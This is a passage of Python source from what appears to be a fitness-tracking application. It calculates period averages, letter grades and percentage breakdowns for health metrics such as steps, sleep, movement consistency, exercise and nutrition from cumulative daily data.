format_summary_name = False
str_range = r[0].strftime("%Y-%m-%d")+" to "+r[1].strftime("%Y-%m-%d")
if range_start_data and range_end_data:
range_start_meta_data = range_start_data.__dict__.get(to_select_related("meta_cum"))
range_start_data = range_start_data.__dict__.get(to_select_related(summary_type))
tmp_summary_type = summary_type
tmp_meta_summary = "meta_cum"
if format_summary_name:
tmp_summary_type = to_select_related(summary_type)
tmp_meta_summary = to_select_related(tmp_meta_summary)
range_end_meta_data = range_end_data.__dict__.get(tmp_meta_summary)
range_end_data = range_end_data.__dict__.get(tmp_summary_type)
ravg = {
"from_dt":r[0].strftime("%Y-%m-%d"),
"to_dt":r[1].strftime("%Y-%m-%d"),
"data":custom_avg_calculator(key,str_range,range_end_data,range_start_data,
range_end_meta_data,range_start_meta_data)
}
else:
ravg = {
"from_dt":r[0].strftime("%Y-%m-%d"),
"to_dt":r[1].strftime("%Y-%m-%d"),
"data":None
}
custom_average_data[str_range] = ravg
return custom_average_data
def _generic_summary_calculator(self,calculated_data_dict,avg_calculator,summary_type):
'''
Generates averages for provided summary type all ranges
(today, yesterday etc) except custom range
Args:
calculated_data_dict (dict): Dictionary where average for
any field (eg overall_health_gpa) in given summary type
(eg overall_health_grade_cum) is calculated and stored
by mutating this dictionary
avg_calculator (function): A function which have average logic
for every field in given summary type.
summary_type(string): Summary type for which averages to be
calculated. This summary type is the relative name of the
model which stores the cumulative data of any summary type
mentioned in self.summary_type. For example, model of
summary type "overall_health" have relative name
"overall_health_grade_cum"
'''
last_three_days_data = self._get_last_three_days_data(summary_type)
todays_data,todays_meta_data = last_three_days_data["today"]
yesterday_data,yesterday_meta_data = last_three_days_data["yesterday"]
day_before_yesterday_data,day_before_yesterday_meta_data = last_three_days_data[
"day_before_yesterday"
]
for key in calculated_data_dict.keys():
for alias, dtobj in self._get_duration_datetime(self.current_date).items():
if alias in self.duration_type:
current_data = self.cumulative_datewise_data.get(dtobj.strftime("%Y-%m-%d"),None)
current_meta_data = None
if current_data:
cached_summary_type = "_{}_cache".format(summary_type)
current_meta_data = current_data.__dict__.get("_meta_cum_cache")
current_data = current_data.__dict__.get(cached_summary_type)
if alias == 'today':
if yesterday_data:
calculated_data_dict[key][alias] = avg_calculator(key,alias,todays_data,
yesterday_data,todays_meta_data,yesterday_meta_data)
continue
elif alias == 'yesterday':
if day_before_yesterday_data:
calculated_data_dict[key][alias] = avg_calculator(key,alias,yesterday_data,
day_before_yesterday_data,yesterday_meta_data,day_before_yesterday_meta_data)
continue
# Avg excluding today, that's why subtract from yesterday's cum sum
calculated_data_dict[key][alias] = avg_calculator(key,alias,yesterday_data,
current_data,yesterday_meta_data,current_meta_data)
def _get_summary_calculator_binding(self):
SUMMARY_CALCULATOR_BINDING = {
"overall_health":self._cal_overall_health_summary,
"non_exercise":self._cal_non_exercise_summary,
"sleep":self._cal_sleep_summary,
"mc":self._cal_movement_consistency_summary,
"ec":self._cal_exercise_consistency_summary,
"nutrition":self._cal_nutrition_summary,
"exercise":self._cal_exercise_summary,
"alcohol":self._cal_alcohol_summary,
"sick":self._cal_sick_summary,
"stress":self._cal_stress_summary,
"travel":self._cal_travel_summary,
"standing":self._cal_standing_summary,
"other":self._cal_other_summary
}
return SUMMARY_CALCULATOR_BINDING
def _create_grade_keys(self, prefix, grades=[]):
if not grades:
grades = ['a','b','c','d','f']
return [prefix+'_'+grade for grade in grades]
def _create_prcnt_grade_keys(self, prefix, grades=[]):
if not grades:
grades = ['a','b','c','d','f']
return ['prcnt_'+prefix+'_'+grade for grade in grades]
def _create_steps_milestone_keys(self, prefix, milestones=[]):
if not milestones:
milestones = ['10k','20k','25k','30k','40k']
return [prefix+'_'+milestone for milestone in milestones]
def _create_prcnt_steps_milestone_keys(self, prefix, milestones=[]):
if not milestones:
milestones = ['10k','20k','25k','30k','40k']
return ['prcnt_'+prefix+'_'+milestone for milestone in milestones]
def _cal_grade_days_over_period(self, today_catg_data, current_catg_data,
key, days_over_period=None):
'''
Calculate the grade bifurcation for given category for example,
number of days got A for overall health gpa (cum_ohg_days_got_a)
etc.
'''
days_till_today = today_catg_data.__dict__[key]
days_till_current = current_catg_data.__dict__[key]
val = days_till_today - days_till_current
if val and days_over_period is not None and not days_over_period:
return 0
return val
def _cal_prcnt_grade_over_period(self, today_catg_data,current_catg_data,
key,duration_type, days_over_period=None):
'''
Calculate the percentage for grade bifurcation for given
category for example, percentage number of days got A for
overall health gpa (prcnt_ohg_days_got_a) for given duration
etc.
Args:
duration_type(string): today, yesterday, week, month, year etc.
days_over_period (int): Manual Number of days over the period
default to None
'''
denominator = self.duration_denominator.get(duration_type)
if days_over_period:
denominator = days_over_period
# create grade key from percentage key
# example - prcnt_ohg_days_got_a -> cum_ohg_days_got_a
grade_key = key.replace("prcnt","cum")
days_till_today = today_catg_data.__dict__[grade_key]
days_till_current = current_catg_data.__dict__[grade_key]
val = days_till_today - days_till_current
prcnt = 0
if denominator:
prcnt = (val/denominator)*100
prcnt = int(Decimal(prcnt).quantize(0,ROUND_HALF_UP))
return prcnt
def _cal_steps_milestone_days_over_period(self, today_catg_data, current_catg_data, key):
'''
Calculate the steps bifurcation for non-exercise or total steps.
for example, number of days got total steps over 10,000
(cum_ts_days_above_10k) etc.
'''
days_till_today = today_catg_data.__dict__[key]
days_till_current = current_catg_data.__dict__[key]
val = days_till_today - days_till_current
return val
def _cal_prcnt_steps_milestone_over_period(self, today_catg_data, current_catg_data,
key, duration_type):
'''
Calculate the percentage for steps bifurcation for total or
non-exercise steps for example, percentage number of days got
steps over 10,000 (prcnt_ts_days_above_10k)for given duration.
Args:
duration_type(string): today, yesterday, week, month, year etc.
'''
denominator = self.duration_denominator.get(duration_type)
grade_key = key.replace("prcnt","cum")
days_till_today = today_catg_data.__dict__[grade_key]
days_till_current = current_catg_data.__dict__[grade_key]
val = days_till_today - days_till_current
prcnt = 0
if denominator:
prcnt = (val/denominator)*100
prcnt = int(Decimal(prcnt).quantize(0,ROUND_HALF_UP))
return prcnt
def _cal_overall_health_summary(self,custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_ohg_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_ohg_got')
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='total_gpa_point':
val = self._get_average_for_duration(
todays_data.cum_total_gpa_point,
current_data.cum_total_gpa_point,alias
)
return round(val,2)
elif key == 'overall_health_gpa':
val = self._get_average_for_duration(
todays_data.cum_overall_health_gpa_point,
current_data.cum_overall_health_gpa_point,alias
)
return round(val,2)
elif key == 'overall_health_gpa_grade':
return garmin_calculation.cal_overall_grade(
self._get_average_for_duration(
todays_data.cum_overall_health_gpa_point,
current_data.cum_overall_health_gpa_point,alias
)
)[0]
elif key in grades_bifurcation_keys:
return self._cal_grade_days_over_period(todays_data,
current_data,
key)
elif key in grades_prcnt_bifurcation_keys:
return self._cal_prcnt_grade_over_period(todays_data,
current_data,
key, alias)
return None
calculated_data = {
'total_gpa_point':{d:None for d in self.duration_type},
'overall_health_gpa':{d:None for d in self.duration_type},
'overall_health_gpa_grade':{d:None for d in self.duration_type}
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "overall_health_grade_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias, summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_non_exercise_summary(self,custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_nes_got')
grades_bifurcation_keys += self._create_grade_keys('cum_days_ts_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_ts_got')
grades_prcnt_bifurcation_keys += self._create_prcnt_grade_keys('days_nes_got')
milestone_bifurcation_keys = self._create_steps_milestone_keys('cum_days_nes_above')
milestone_bifurcation_keys += self._create_steps_milestone_keys('cum_days_ts_above')
milestone_prcnt_bifurcation_keys = self._create_prcnt_steps_milestone_keys(
'days_nes_above')
milestone_prcnt_bifurcation_keys += self._create_prcnt_steps_milestone_keys(
'days_ts_above')
def _calculate(key, alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='non_exercise_steps':
val = self._get_average_for_duration(
todays_data.cum_non_exercise_steps,
current_data.cum_non_exercise_steps,alias)
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'non_exericse_steps_gpa':
val = self._get_average_for_duration(
todays_data.cum_non_exercise_steps_gpa,
current_data.cum_non_exercise_steps_gpa,alias)
return round(val,2)
elif key == 'total_steps':
val = self._get_average_for_duration(
todays_data.cum_total_steps,
current_data.cum_total_steps,alias)
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'movement_non_exercise_step_grade':
return garmin_calculation.cal_non_exercise_step_grade(
self._get_average_for_duration(
todays_data.cum_non_exercise_steps,
current_data.cum_non_exercise_steps,alias
)
)[0]
elif key == 'exercise_steps':
total_steps = self._get_average_for_duration(
todays_data.cum_total_steps,
current_data.cum_total_steps,alias)
non_exec_steps = self._get_average_for_duration(
todays_data.cum_non_exercise_steps,
current_data.cum_non_exercise_steps,alias)
exercise_steps = total_steps - non_exec_steps
return int(Decimal(exercise_steps).quantize(0,ROUND_HALF_UP))
elif key in grades_bifurcation_keys:
return self._cal_grade_days_over_period(todays_data,
current_data,
key)
elif key in grades_prcnt_bifurcation_keys:
return self._cal_prcnt_grade_over_period(todays_data,
current_data,
key, alias)
elif key in milestone_bifurcation_keys:
return self._cal_steps_milestone_days_over_period(todays_data,
current_data,
key)
elif key in milestone_prcnt_bifurcation_keys:
return self._cal_prcnt_steps_milestone_over_period(todays_data,
current_data,
key, alias)
return None
calculated_data = {
'non_exercise_steps':{d:None for d in self.duration_type},
'movement_non_exercise_step_grade':{d:None for d in self.duration_type},
'non_exericse_steps_gpa':{d:None for d in self.duration_type},
'total_steps':{d:None for d in self.duration_type},
'exercise_steps':{d:None for d in self.duration_type}
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in milestone_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in milestone_prcnt_bifurcation_keys})
summary_type = "non_exercise_steps_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_sleep_summary(self,custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_sleep_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_sleep_got')
def _get_sleep_grade_from_point_for_ranges(point):
if point < 1:
return 'F'
elif point >= 1 and point < 2:
return 'D'
elif point >= 2 and point < 2.8:
return 'C'
elif point >= 2.8 and point < 3.3:
return 'B'
else:
return 'A'
def _cal_custom_average(stat1, stat2,days):
if not stat1 == None and not stat2 == None and days:
avg = (stat1 - stat2)/days
return avg
return 0
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key == 'total_sleep_in_hours_min':
if todays_meta_data and current_meta_data:
sleep_days = (
todays_meta_data.cum_sleep_reported_days_count -
current_meta_data.cum_sleep_reported_days_count
)
if sleep_days:
val = _cal_custom_average(
todays_data.cum_total_sleep_in_hours,
current_data.cum_total_sleep_in_hours,sleep_days)
return self._hours_to_hours_min(val)
else:
return "00:00"
if key == 'deep_sleep_in_hours_min':
if todays_meta_data and current_meta_data:
sleep_days = (
todays_meta_data.cum_sleep_reported_days_count -
current_meta_data.cum_sleep_reported_days_count
)
if sleep_days:
val = _cal_custom_average(
todays_data.cum_deep_sleep_in_hours,
current_data.cum_deep_sleep_in_hours,sleep_days)
return self._hours_to_hours_min(val)
else:
return "00:00"
if key == 'awake_duration_in_hours_min':
if todays_meta_data and current_meta_data:
sleep_days = (
todays_meta_data.cum_sleep_reported_days_count -
current_meta_data.cum_sleep_reported_days_count
)
if sleep_days:
val = _cal_custom_average(
todays_data.cum_awake_duration_in_hours,
current_data.cum_awake_duration_in_hours,sleep_days)
return self._hours_to_hours_min(val)
else:
return "00:00"
elif key == 'overall_sleep_gpa':
if todays_meta_data and current_meta_data:
sleep_days = (
todays_meta_data.cum_sleep_reported_days_count -
current_meta_data.cum_sleep_reported_days_count
)
if sleep_days:
val = _cal_custom_average(
todays_data.cum_overall_sleep_gpa,
current_data.cum_overall_sleep_gpa,sleep_days)
return round(val,2)
else:
return 0
elif key == 'average_sleep_grade':
if todays_meta_data and current_meta_data:
sleep_days = (
todays_meta_data.cum_sleep_reported_days_count -
current_meta_data.cum_sleep_reported_days_count
)
if sleep_days:
avg_sleep_gpa = round(_cal_custom_average(
todays_data.cum_overall_sleep_gpa,
current_data.cum_overall_sleep_gpa,sleep_days),2)
if alias == 'today' or alias == 'yesterday':
return garmin_calculation._get_sleep_grade_from_point(avg_sleep_gpa)
else:
return _get_sleep_grade_from_point_for_ranges(avg_sleep_gpa)
else:
return 'F'
elif key == 'num_days_sleep_aid_taken_in_period':
if todays_meta_data and current_meta_data:
val = 0
if ((todays_data.cum_days_sleep_aid_taken is not None) and
(current_data.cum_days_sleep_aid_taken is not None)):
val = todays_data.cum_days_sleep_aid_taken - current_data.cum_days_sleep_aid_taken
return val
elif key == 'prcnt_days_sleep_aid_taken_in_period':
if todays_meta_data and current_meta_data:
val = 0
if((todays_data.cum_days_sleep_aid_taken is not None) and
(current_data.cum_days_sleep_aid_taken is not None)):
val = todays_data.cum_days_sleep_aid_taken - current_data.cum_days_sleep_aid_taken
prcnt = 0
if val:
# if duration denominator is greator than 0
if self.duration_denominator[alias]:
prcnt = (val / self.duration_denominator[alias])*100
prcnt = int(Decimal(prcnt).quantize(0,ROUND_HALF_UP))
return prcnt
elif key in grades_bifurcation_keys:
if todays_meta_data and current_meta_data:
sleep_days = (
todays_meta_data.cum_sleep_reported_days_count -
current_meta_data.cum_sleep_reported_days_count
)
return self._cal_grade_days_over_period(todays_data,current_data,
key, sleep_days)
elif key in grades_prcnt_bifurcation_keys:
if todays_meta_data and current_meta_data:
sleep_days = (
todays_meta_data.cum_sleep_reported_days_count -
current_meta_data.cum_sleep_reported_days_count
)
return self._cal_prcnt_grade_over_period(todays_data,current_data,
key, alias, sleep_days)
return None
calculated_data = {
'total_sleep_in_hours_min':{d:None for d in self.duration_type},
'deep_sleep_in_hours_min':{d:None for d in self.duration_type},
'awake_duration_in_hours_min':{d:None for d in self.duration_type},
'average_sleep_grade':{d:None for d in self.duration_type},
'num_days_sleep_aid_taken_in_period':{d:None for d in self.duration_type},
'prcnt_days_sleep_aid_taken_in_period':{d:None for d in self.duration_type},
'overall_sleep_gpa':{d:None for d in self.duration_type},
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "sleep_per_night_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_movement_consistency_summary(self,custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_mcs_got')
grades_bifurcation_keys += self._create_grade_keys('cum_days_total_act_min_got')
grades_bifurcation_keys += self._create_grade_keys('cum_days_act_min_no_sleep_exec_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_mcs_got')
grades_prcnt_bifurcation_keys += self._create_prcnt_grade_keys('days_total_act_min_got')
grades_prcnt_bifurcation_keys += self._create_prcnt_grade_keys('days_act_min_no_sleep_exec_got')
def _cal_custom_average(stat1, stat2,days):
if not stat1 == None and not stat2 == None and days:
avg = (stat1 - stat2)/days
return avg
return 0
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='movement_consistency_score':
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
val = _cal_custom_average(
todays_data.cum_movement_consistency_score,
current_data.cum_movement_consistency_score,
mc_days)
if mc_days:
return round(val,2)
else:
return "Not Reported"
return None
elif key == 'movement_consistency_gpa':
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
val = _cal_custom_average(
todays_data.cum_movement_consistency_gpa,
current_data.cum_movement_consistency_gpa,
mc_days)
if mc_days:
return round(val,2)
else:
return "Not Reported"
return None
elif key == 'movement_consistency_grade':
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
grade = garmin_calculation.cal_movement_consistency_grade(
_cal_custom_average(
todays_data.cum_movement_consistency_score,
current_data.cum_movement_consistency_score,
mc_days
)
)
if mc_days:
return grade
else:
return "Not Reported"
return None
elif key == "total_active_minutes":
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
value = round(_cal_custom_average(
todays_data.cum_total_active_min,
current_data.cum_total_active_min,
mc_days))
if mc_days:
return value
else:
return "Not Reported"
elif key == "sleep_active_minutes":
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
value = round(_cal_custom_average(
todays_data.cum_sleep_active_min,
current_data.cum_sleep_active_min,
mc_days))
if mc_days:
return value
else:
return "Not Reported"
elif key == "exercise_active_minutes":
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
value = round(_cal_custom_average(
todays_data.cum_exercise_active_min,
current_data.cum_exercise_active_min,
mc_days))
if mc_days:
return value
else:
return "Not Reported"
elif key == "active_minutes_without_sleep":
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
act_min_without_sleep_today = (
todays_data.cum_total_active_min
- todays_data.cum_sleep_active_min)
act_min_without_sleep_currently = (
current_data.cum_total_active_min
- current_data.cum_sleep_active_min)
value = round(_cal_custom_average(
act_min_without_sleep_today,
act_min_without_sleep_currently,
mc_days))
if mc_days:
return value
else:
return "Not Reported"
elif key == "active_minutes_without_sleep_exercise":
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
act_min_without_sleep_exercise_today = (
todays_data.cum_total_active_min
- todays_data.cum_sleep_active_min
- todays_data.cum_exercise_active_min)
act_min_without_sleep_exercise_currently = (
current_data.cum_total_active_min
- current_data.cum_sleep_active_min
- current_data.cum_exercise_active_min)
value = round(_cal_custom_average(
act_min_without_sleep_exercise_today,
act_min_without_sleep_exercise_currently,
mc_days))
if mc_days:
return value
else:
return "Not Reported"
elif key == "total_active_minutes_prcnt":
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count -
current_meta_data.cum_mc_recorded_days_count
)
value = round(_cal_custom_average(
todays_data.cum_total_active_min,
current_data.cum_total_active_min,
mc_days))
active_prcnt = round((value/1440)*100)
if mc_days:
return active_prcnt
else:
return "Not Reported"
elif key == "active_minutes_without_sleep_prcnt":
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count
- current_meta_data.cum_mc_recorded_days_count
)
act_min_without_sleep_today = (
todays_data.cum_total_active_min
- todays_data.cum_sleep_active_min)
act_min_without_sleep_currently = (
current_data.cum_total_active_min
- current_data.cum_sleep_active_min)
avg_sleep_mins = round(_cal_custom_average(
todays_data.cum_sleep_hours,
current_data.cum_sleep_hours,
mc_days
))
total_mins_without_sleep = 1440 - (avg_sleep_mins)
value = round(_cal_custom_average(
act_min_without_sleep_today,
act_min_without_sleep_currently,
mc_days))
try:
active_prcnt = round((
value/total_mins_without_sleep)*100)
except ZeroDivisionError:
active_prcnt = 0
if mc_days:
return active_prcnt
else:
return "Not Reported"
elif key == "active_minutes_without_sleep_exercise_prcnt":
if todays_meta_data and current_meta_data:
mc_days = (
todays_meta_data.cum_mc_recorded_days_count
- current_meta_data.cum_mc_recorded_days_count
)
act_min_without_sleep_exercise_today = (
todays_data.cum_total_active_min
- todays_data.cum_sleep_active_min
- todays_data.cum_exercise_active_min)
act_min_without_sleep_exercise_currently = (
current_data.cum_total_active_min
- current_data.cum_sleep_active_min
- current_data.cum_exercise_active_min)
avg_sleep_mins = round(_cal_custom_average(
todays_data.cum_sleep_hours,
current_data.cum_sleep_hours,
mc_days
))
avg_exercise_mins = round(_cal_custom_average(
todays_data.cum_exercise_hours,
current_data.cum_exercise_hours,
mc_days
))
total_mins_without_sleep_exercise = (1440
- avg_sleep_mins
- avg_exercise_mins)
value = round(_cal_custom_average(
act_min_without_sleep_exercise_today,
act_min_without_sleep_exercise_currently,
mc_days))
try:
active_prcnt = round(
(value/total_mins_without_sleep_exercise)*100)
except ZeroDivisionError:
active_prcnt = 0
if mc_days:
return active_prcnt
else:
return "Not Reported"
elif key in grades_bifurcation_keys:
mc_days = todays_meta_data.cum_mc_recorded_days_count\
- current_meta_data.cum_mc_recorded_days_count
return self._cal_grade_days_over_period(todays_data,current_data,
key, mc_days)
elif key in grades_prcnt_bifurcation_keys:
if todays_meta_data and current_meta_data:
mc_days = todays_meta_data.cum_mc_recorded_days_count\
- current_meta_data.cum_mc_recorded_days_count
return self._cal_prcnt_grade_over_period(todays_data,current_data,
key, alias, mc_days)
return None
calculated_data = {
'movement_consistency_score':{d:None for d in self.duration_type},
'movement_consistency_grade':{d:None for d in self.duration_type},
'movement_consistency_gpa':{d:None for d in self.duration_type},
'total_active_minutes':{d:None for d in self.duration_type},
'sleep_active_minutes':{d:None for d in self.duration_type},
'exercise_active_minutes':{d:None for d in self.duration_type},
'total_active_minutes_prcnt':{d:None for d in self.duration_type},
'active_minutes_without_sleep':{d:None for d in self.duration_type},
'active_minutes_without_sleep_prcnt':{d:None for d in self.duration_type},
'active_minutes_without_sleep_exercise':{d:None for d in self.duration_type},
'active_minutes_without_sleep_exercise_prcnt':{d:None for d in self.duration_type},
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "movement_consistency_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_exercise_consistency_summary(self,custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_ec_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_ec_got')
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='avg_no_of_days_exercises_per_week':
val = self._get_average_for_duration(
todays_data.cum_avg_exercise_day,
current_data.cum_avg_exercise_day,alias)
return round(val,2)
elif key == 'exercise_consistency_gpa':
val = self._get_average_for_duration(
todays_data.cum_exercise_consistency_gpa,
current_data.cum_exercise_consistency_gpa,alias)
return round(val,2)
elif key == 'exercise_consistency_grade':
return garmin_calculation.cal_exercise_consistency_grade(
self._get_average_for_duration(
todays_data.cum_avg_exercise_day,
current_data.cum_avg_exercise_day,alias
)
)[0]
elif key in grades_bifurcation_keys:
return self._cal_grade_days_over_period(todays_data,
current_data,
key)
elif key in grades_prcnt_bifurcation_keys:
return self._cal_prcnt_grade_over_period(todays_data,
current_data,
key, alias)
return None
calculated_data = {
'avg_no_of_days_exercises_per_week':{d:None for d in self.duration_type},
'exercise_consistency_grade':{d:None for d in self.duration_type},
'exercise_consistency_gpa':{d:None for d in self.duration_type},
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "exercise_consistency_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_nutrition_summary(self, custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_ufood_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_ufood_got')
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='prcnt_unprocessed_volume_of_food':
val = self._get_average_for_duration(
todays_data.cum_prcnt_unprocessed_food_consumed,
current_data.cum_prcnt_unprocessed_food_consumed,alias)
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'prcnt_unprocessed_food_gpa':
val = self._get_average_for_duration(
todays_data.cum_prcnt_unprocessed_food_consumed_gpa,
current_data.cum_prcnt_unprocessed_food_consumed_gpa,alias)
return round(val,2)
elif key == 'prcnt_unprocessed_food_grade':
return garmin_calculation.cal_unprocessed_food_grade(
self._get_average_for_duration(
todays_data.cum_prcnt_unprocessed_food_consumed,
current_data.cum_prcnt_unprocessed_food_consumed,alias
)
)[0]
elif key in grades_bifurcation_keys:
return self._cal_grade_days_over_period(todays_data,
current_data,
key)
elif key in grades_prcnt_bifurcation_keys:
return self._cal_prcnt_grade_over_period(todays_data,
current_data,
key, alias)
return None
calculated_data = {
'prcnt_unprocessed_volume_of_food':{d:None for d in self.duration_type},
'prcnt_unprocessed_food_grade':{d:None for d in self.duration_type},
'prcnt_unprocessed_food_gpa':{d:None for d in self.duration_type},
}
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_bifurcation_keys})
calculated_data.update({key:{d:None for d in self.duration_type}
for key in grades_prcnt_bifurcation_keys})
summary_type = "nutrition_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_exercise_summary(self, custom_daterange = False):
grades_bifurcation_keys = self._create_grade_keys('cum_days_workout_dur_got')
grades_prcnt_bifurcation_keys = self._create_prcnt_grade_keys('days_workout_dur_got')
def _cal_workout_dur_average(stat1, stat2,workout_days):
if not stat1 == None and not stat2 == None and workout_days:
avg = (stat1 - stat2)/workout_days
return avg
return 0
def _cal_effort_lvl_average(stat1, stat2, effort_lvl_days):
if not stat1 == None and not stat2 == None and effort_lvl_days:
avg = (stat1 - stat2)/effort_lvl_days
return avg
return 0
def _cal_vo2max_average(stat1, stat2, vo2max_days):
if not stat1 == None and not stat2 == None and vo2max_days:
avg = (stat1 - stat2)/vo2max_days
return avg
return 0
def _cal_avg_exercise_hr_average(stat1, stat2, avg_exercise_hr_days):
if not stat1 == None and not stat2 == None and avg_exercise_hr_days:
avg = (stat1 - stat2)/avg_exercise_hr_days
return avg
return 0
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='workout_duration_hours_min':
if todays_meta_data and current_meta_data:
workout_days = (todays_meta_data.cum_workout_days_count -
current_meta_data.cum_workout_days_count)
avg_hours = _cal_workout_dur_average(
todays_data.cum_workout_duration_in_hours,
current_data.cum_workout_duration_in_hours,
workout_days
)
return self._hours_to_hours_min(avg_hours)
return None
elif key == 'total_workout_duration_over_range':
if todays_meta_data and current_meta_data:
total_duration_over_period = todays_data.cum_workout_duration_in_hours\
- current_data.cum_workout_duration_in_hours
return self._hours_to_hours_min(total_duration_over_period)
return None
elif key == 'workout_effort_level':
if todays_meta_data and current_meta_data:
effort_lvl_days = (todays_meta_data.cum_effort_level_days_count -
current_meta_data.cum_effort_level_days_count)
val = _cal_effort_lvl_average(
todays_data.cum_workout_effort_level,
current_data.cum_workout_effort_level,
effort_lvl_days
)
return round(val,2)
elif key == 'avg_exercise_heart_rate':
if todays_meta_data and current_meta_data:
avg_exercise_hr_days = (todays_meta_data.cum_avg_exercise_hr_days_count -
current_meta_data.cum_avg_exercise_hr_days_count)
val = _cal_avg_exercise_hr_average(
todays_data.cum_avg_exercise_hr,
current_data.cum_avg_exercise_hr,
avg_exercise_hr_days
)
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'avg_non_strength_exercise_heart_rate':
if todays_meta_data and current_meta_data:
avg_exercise_hr_days = (todays_meta_data.cum_avg_exercise_hr_days_count -
current_meta_data.cum_avg_exercise_hr_days_count)
val = _cal_avg_exercise_hr_average(
todays_data.cum_avg_non_strength_exercise_hr,
current_data.cum_avg_non_strength_exercise_hr,
avg_exercise_hr_days
)
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
elif key == 'total_non_strength_activities':
total_exercise = todays_data.cum_total_exercise_activities\
- current_data.cum_total_exercise_activities
total_strength = todays_data.cum_total_strength_activities\
- current_data.cum_total_strength_activities
return total_exercise - total_strength
elif key == 'total_strength_activities':
val = todays_data.cum_total_strength_activities\
- current_data.cum_total_strength_activities
return val
elif key == 'vo2_max':
if todays_meta_data and current_meta_data:
